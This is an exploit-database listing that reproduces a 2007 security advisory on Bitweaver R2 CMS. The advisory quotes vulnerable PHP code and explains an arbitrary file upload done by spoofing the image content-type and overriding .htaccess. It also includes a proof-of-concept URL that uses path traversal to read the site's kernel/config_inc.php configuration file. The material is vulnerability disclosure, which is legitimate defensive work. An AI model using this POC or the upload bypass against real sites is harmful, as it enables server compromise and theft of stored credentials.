header-logo
Suggest Exploit
vendor:
Bitweaver R2 CMS
by:
AmnPardaz Security Research Team
N/A
CVSS
N/A
source code disclosure, arbitrary file upload
Unknown
CWE
Product Name: Bitweaver R2 CMS
Affected Version From: 2 (prior versions also may be affected)
Affected Version To: Unknown
Patch Exists: No
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Bitweaver R2 CMS

Bitweaver is an open source content management system. Its speed and power are ideal for large-scale community websites and corporate applications, but it is simple enough for non-technical small site users to set up and administrate. The vulnerabilities in Bitweaver R2 CMS include arbitrary file upload and source code disclosure. The arbitrary file upload vulnerability can be exploited through the /fisheye/upload.php file, where an attacker can upload arbitrary files with image/gif content-type. Additionally, the attacker can bypass the '/storage/.htaccess' restriction by uploading their own .htaccess file. The source code disclosure vulnerability can be exploited through the /wiki/edit.php file, where an attacker can suck another page and append it to the end of the current page.

Mitigation:

No fix is currently available.
Source

Exploit-DB raw data:

########################## WwW.BugReport.ir #########################
#
#      AmnPardaz Security Research Team
#
# Title: Bitweaver R2 CMS
# Vendor: http://www.bitweaver.org
# Bugs: source code disclosure, arbitrary file upload
# Vulnerable Version: 2 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix Available: No!
################################################################


####################
- Description:
####################

Bitweaver is an open source content management system. Its speed and power are ideal for large-scale community websites and corporate applications, but it is simple enough for non-technical small site users to set up and administrate.

####################
- Vulnerability:
####################

+--> arbitrary file upload

Code Snippet:

/fisheye/upload.php line#32-45

	$i = 0;
	foreach( array_keys( $_FILES ) as $key ) {
		if( preg_match( '/(^image|pdf)/i', $_FILES[$key]['type'] ) ) {
			$upImages[$key] = $_FILES[$key];
			if( !empty( $_REQUEST['imagedata'][$i] ) ) {
				$upData[$key] = $_REQUEST['imagedata'][$i];
			} else {
				$upData[$key] = array();
			}
		} elseif( !empty( $_FILES[$key]['tmp_name'] ) && !empty( $_FILES[$key]['name'] ) ) {
			$upArchives[$key] = $_FILES[$key];
		}
		$i++;
	}

It's possible to upload arbitrary files with image/gif content-type (this can be changed via local proxy or direct content altertion)
also its possible for an attacker to bypass "/storage/.htaccess" restriction by uploadding his own .htaccess and control server settings.


+-->source code disclosure

Code Snippet:

/wiki/edit.php line#179-195

if( isset( $_REQUEST["suck_url"] ) ) {
	// Suck another page and append to the end of current
	require_once( UTIL_PKG_PATH.'htmlparser/html_parser_inc.php' );
	$suck_url = isset( $_REQUEST["suck_url"] ) ? $_REQUEST["suck_url"] : '';
	$parsehtml = isset( $_REQUEST["parsehtml"] ) ? ( $_REQUEST["parsehtml"] == 'on' ? 'y' : 'n' ): 'n';
	if( isset( $_REQUEST['do_suck'] ) && strlen( $suck_url ) > 0 ) {
		.
		.
		.
		$sdta = @file_get_contents( $suck_url );

POC: http://localhost/bitweaver/wiki/edit.php?page=SandBox&suck_url=./../kernel/config_inc.php&do_suck=h

####################
- Credit :
####################
Original Advisory:http://www.bugreport.ir/?/24
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

# milw0rm.com [2007-12-30]

Navigation

Suggest Exploit

Services By CQR